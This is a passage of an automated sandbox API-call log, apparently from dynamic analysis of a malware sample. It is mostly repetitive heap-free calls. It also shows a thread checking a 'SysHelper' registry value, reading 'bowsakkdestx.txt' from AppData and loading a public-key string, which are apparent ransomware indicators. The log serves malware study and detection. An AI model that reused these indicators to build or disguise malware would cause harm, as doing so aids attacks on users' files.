lpMem=0x2a9af48 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea68 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a4b570 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a809e8 | out: hHeap=0x2c0000) returned 1 [0200.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a801d0 | out: hHeap=0x2c0000) returned 1 [0200.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7f9b8 | out: hHeap=0x2c0000) returned 1 [0200.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7f1a0 | out: hHeap=0x2c0000) returned 1 [0200.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7e988 | out: hHeap=0x2c0000) returned 1 [0200.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7e170 | out: hHeap=0x2c0000) returned 1 [0200.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d958 | out: hHeap=0x2c0000) returned 1 [0200.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381af0 | out: hHeap=0x2c0000) returned 1 [0200.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81210 | out: hHeap=0x2c0000) returned 1 [0200.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a82270 | out: hHeap=0x2c0000) returned 1 [0200.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a82aa8 | out: hHeap=0x2c0000) returned 1 [0200.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a832e0 | out: hHeap=0x2c0000) returned 1 [0200.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a83b18 | out: hHeap=0x2c0000) returned 1 [0200.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a84b90 | out: hHeap=0x2c0000) returned 1 [0200.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a84350 | out: hHeap=0x2c0000) returned 1 [0200.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0200.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a85c20 | out: hHeap=0x2c0000) returned 1 [0200.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a86cb8 | out: hHeap=0x2c0000) returned 1 [0200.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87510 | out: hHeap=0x2c0000) returned 1 [0200.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a853d8 | out: hHeap=0x2c0000) returned 1 [0200.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a86468 | out: hHeap=0x2c0000) returned 1 [0200.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a885a8 | out: hHeap=0x2c0000) returned 1 [0200.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a89638 | out: hHeap=0x2c0000) returned 1 [0200.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a88df0 | out: hHeap=0x2c0000) returned 1 [0200.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a89e80 | out: hHeap=0x2c0000) returned 1 [0200.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8a6b8 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8aef0 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8b718 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8bf40 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8c768 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8cfa0 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8d7d8 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a37710 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8e850 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8f0a8 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a37f98 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a38820 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8e000 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a90048 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a910d8 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a90890 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a91920 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a390a8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a39930 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3a1b8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a92988 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a939f8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3aa40 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a94a80 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a952d8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3b2c8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3bb50 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a94230 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a96370 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a97400 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3cc60 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3d4e8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3dd70 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3c3d8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a3e5f8 | out: hHeap=0x2c0000) returned 1 [0200.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a44f10 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a45798 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a468a8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a46020 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a98d70 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a995c8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a47130 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a479b8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a48ac8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a96bb8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a49350 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a49bd8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a4a460 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a48240 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a4ace8 | out: hHeap=0x2c0000) returned 1 [0200.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a97c48 | out: hHeap=0x2c0000) returned 1 [0200.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a75390 | out: hHeap=0x2c0000) returned 1 [0200.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2e930 | out: hHeap=0x2c0000) returned 1 [0200.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a76400 | out: hHeap=0x2c0000) returned 1 [0200.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74540 | out: hHeap=0x2c0000) returned 1 [0200.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a084d8 | out: hHeap=0x2c0000) returned 1 [0200.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd2a0 | out: hHeap=0x2c0000) returned 1 [0200.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac1bb0 | out: hHeap=0x2c0000) returned 1 [0200.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac2438 | out: hHeap=0x2c0000) returned 1 [0200.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac2cc0 | out: hHeap=0x2c0000) returned 1 [0200.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3548 | out: hHeap=0x2c0000) returned 1 [0200.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2e998 | out: hHeap=0x2c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac0218 | out: hHeap=0x2c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a95b30 | out: hHeap=0x2c0000) returned 1 [0200.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad0200 | out: hHeap=0x2c0000) returned 1 [0200.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad0a18 | out: hHeap=0x2c0000) returned 1 [0200.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad1230 | out: hHeap=0x2c0000) returned 1 [0200.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad1a48 | out: hHeap=0x2c0000) returned 1 [0200.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac0aa0 | out: hHeap=0x2c0000) returned 1 [0200.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac1328 | out: hHeap=0x2c0000) returned 1 [0200.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a24528 | out: hHeap=0x2c0000) returned 1 [0200.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9c058 | out: hHeap=0x2c0000) returned 1 [0200.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9c8e0 | out: hHeap=0x2c0000) returned 1 [0200.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9d168 | out: hHeap=0x2c0000) returned 1 [0200.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9d9f0 | out: hHeap=0x2c0000) returned 1 [0200.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9e278 | out: hHeap=0x2c0000) returned 1 [0200.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a98520 | out: hHeap=0x2c0000) returned 1 [0200.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9eb00 | out: hHeap=0x2c0000) returned 1 [0200.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9f388 | out: hHeap=0x2c0000) returned 1 [0200.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7ca10 | out: hHeap=0x2c0000) returned 1 [0200.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2c0000) returned 1 [0200.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2c0000) returned 1 [0200.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9fc10 | out: hHeap=0x2c0000) returned 1 [0200.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa0498 | out: hHeap=0x2c0000) returned 1 [0200.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2c0000) returned 1 [0200.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aab718 | out: hHeap=0x2c0000) returned 1 [0200.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa0d20 | out: hHeap=0x2c0000) returned 1 [0200.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa15a8 | out: hHeap=0x2c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa1e30 | out: hHeap=0x2c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa26b8 | out: hHeap=0x2c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa2f40 | out: hHeap=0x2c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa37c8 | out: hHeap=0x2c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa4050 | out: hHeap=0x2c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa48d8 | out: hHeap=0x2c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa5160 | out: hHeap=0x2c0000) returned 1 [0200.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa59e8 | out: hHeap=0x2c0000) returned 1 [0200.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aabf60 | out: hHeap=0x2c0000) returned 1 [0200.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aac7b8 | out: hHeap=0x2c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa6270 | out: hHeap=0x2c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa6af8 | out: hHeap=0x2c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa7380 | out: hHeap=0x2c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aad010 | out: hHeap=0x2c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aad858 | out: hHeap=0x2c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa7c08 | out: hHeap=0x2c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa8490 | out: hHeap=0x2c0000) returned 1 [0200.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aa8d18 | out: hHeap=0x2c0000) returned 1 [0200.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aae0b8 | out: hHeap=0x2c0000) returned 1 [0200.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aae940 | out: hHeap=0x2c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aaf1c8 | out: hHeap=0x2c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aafa50 | out: hHeap=0x2c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab02d8 | out: hHeap=0x2c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab0b60 | out: hHeap=0x2c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abe0a0 | out: hHeap=0x2c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abe8f8 | out: hHeap=0x2c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab13e8 | out: hHeap=0x2c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab1c70 | out: hHeap=0x2c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab24f8 | out: hHeap=0x2c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab2d80 | out: hHeap=0x2c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab3608 | out: hHeap=0x2c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab3e90 | out: hHeap=0x2c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab4718 | out: hHeap=0x2c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab4fa0 | out: hHeap=0x2c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab5828 | out: hHeap=0x2c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab60b0 | out: hHeap=0x2c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab6938 | out: hHeap=0x2c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab71c0 | out: hHeap=0x2c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab7a48 | out: hHeap=0x2c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab82d0 | out: hHeap=0x2c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abf150 | out: hHeap=0x2c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abf9a8 | out: hHeap=0x2c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab8b58 | out: hHeap=0x2c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab93e0 | out: hHeap=0x2c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ab9c68 | out: hHeap=0x2c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aba4f0 | out: hHeap=0x2c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abad78 | out: hHeap=0x2c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abb600 | out: hHeap=0x2c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abbe88 | out: hHeap=0x2c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abc710 | out: hHeap=0x2c0000) returned 1 [0200.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2abcf98 | out: hHeap=0x2c0000) returned 1 [0200.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a8f900 | out: hHeap=0x2c0000) returned 1 [0200.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a931c0 | out: hHeap=0x2c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea00 | out: hHeap=0x2c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7b998 | out: hHeap=0x2c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9b7d0 | out: hHeap=0x2c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a92158 | out: hHeap=0x2c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7b0a0 | out: hHeap=0x2c0000) returned 1 [0200.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fd0 | out: hHeap=0x2c0000) returned 1 [0200.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0110 | out: hHeap=0x2c0000) returned 1 [0200.670] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0200.670] ExitProcess (uExitCode=0x0) [0200.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df4a8 | out: hHeap=0x2c0000) returned 1 Thread: id = 108 os_tid = 0x4b8 Thread: id = 109 os_tid = 0x428 Thread: id = 110 os_tid = 0x4b0 Thread: id = 111 os_tid = 0x34c Thread: id = 112 os_tid = 0x4f4 Thread: id = 113 os_tid = 0x4f8 Thread: id = 161 os_tid = 0x5d4 [0177.742] timeGetTime () returned 0x98eb [0177.742] GetLastError () returned 0x54f [0177.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2a73510 [0177.754] GetCurrentThreadId () returned 0x5d4 [0177.754] SetLastError (dwErrCode=0x54f) [0177.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x8cca5e4 | out: phkResult=0x8cca5e4*=0x4ec) returned 0x0 [0177.754] RegQueryValueExW (in: hKey=0x4ec, lpValueName="SysHelper", lpReserved=0x0, lpType=0x8cca5d8, lpData=0x8cca5e0, lpcbData=0x8cca5dc*=0x4 | out: lpType=0x8cca5d8*=0x4, lpData=0x8cca5e0*=0x1, lpcbData=0x8cca5dc*=0x4) returned 0x0 [0177.755] RegCloseKey (hKey=0x4ec) returned 0x0 [0177.755] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x8cca4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0177.755] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6368 [0177.768] AreFileApisANSI () returned 1 [0177.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8cca4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0177.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0177.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8cca4e4, cbMultiByte=-1, lpWideCharStr=0x313fa0, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0177.789] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cca368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0177.793] GetFileType (hFile=0x4ec) returned 0x1 [0177.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0177.811] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cca418 | out: lpNewFilePointer=0x0) returned 1 [0177.811] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cca410 | out: lpNewFilePointer=0x0) returned 1 [0177.811] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cc93f4 | out: lpNewFilePointer=0x0) returned 1 [0177.811] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cc93ec | out: lpNewFilePointer=0x0) returned 1 [0177.812] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cca434 | out: lpNewFilePointer=0x0) returned 1 [0177.812] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cca42c | out: lpNewFilePointer=0x0) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x2a738d8 [0177.812] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a738d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8cca3c4, lpOverlapped=0x0 | out: lpBuffer=0x2a738d8*, lpNumberOfBytesRead=0x8cca3c4*=0x22d, lpOverlapped=0x0) returned 1 [0177.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a738d8 | out: hHeap=0x2c0000) returned 1 [0177.849] CloseHandle (hObject=0x4ec) returned 1 [0177.850] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0177.850] lstrcpyA (in: lpString1=0x8ccab78, lpString2="-----BEGIN PUBLIC 